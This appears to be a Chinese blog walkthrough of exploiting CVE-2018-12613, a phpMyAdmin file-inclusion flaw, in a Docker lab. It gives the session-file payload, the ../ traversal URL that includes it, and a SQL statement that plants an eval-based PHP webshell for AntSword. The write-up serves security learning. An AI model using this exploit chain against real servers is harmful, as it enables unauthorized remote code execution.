CVE-2018-12613 PHPmyadmin文件包含漏洞

目录

1. 激活靶场​

2.漏洞验证

        2.1.浏览器访问,并访问server_sql.php,尝试写入一个phpinfo的小马

        2.2.查看session

        2.3.写入内容验证 

        2.4.浏览器执行

3.写入webshell

          3.1. phpinfo小马的作用    

      3.2. 换个厉害的马

         3.3. 包含文件

4. getshell


1. 激活靶场

2.漏洞验证

        2.1.浏览器访问,并访问server_sql.php,尝试写入一个phpinfo的小马

        2.2.查看session

        2.3.写入内容验证 

        进入靶场环境,查看是否写入:

docker ps        // 查看容器ID
docker exec ID /bin/bash    
ls
ls /tmp

经过与浏览器的session对比,查找到对应的文件

查看内容

tac /tmp/sess_2d198bfd6b6b4fe8366a83ef7220213e

 内容成功写入

        2.4.浏览器执行

http://127.0.0.1:8080/?target=sql.php?/../../../../../../../../tmp/sess_2d198bfd6b6b4fe8366a83ef7220213e

phpinfo小马成功执行

3.写入webshell

          3.1. phpinfo小马的作用    

        因为利用写入session的方式来写入shell,那么写入phpinfo小马的作用就很明显了,得到context_document_root的路径

      3.2. 换个厉害的马

        继续与写入phpinfo的操作一致,这次需要写入一个木马文件

         写入下列语句并执行

select "<?php file_put_contents('/var/www/html/getshell_new.php','<?php @eval($_POST[getshell_new]);?>')?>"

// 作用在于将POST得到的数据,写入到一个新的文件中

                

 查看session,并在靶场环境中检验一下是否成功,和写入小马的操作一样的,俺就不罗嗦了

 

         3.3. 包含文件

 尝试访问包含的get_shell.php,成功访问,说明包含成功

4. getshell

 打开中国蚁剑,建立连接

 

 

 

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值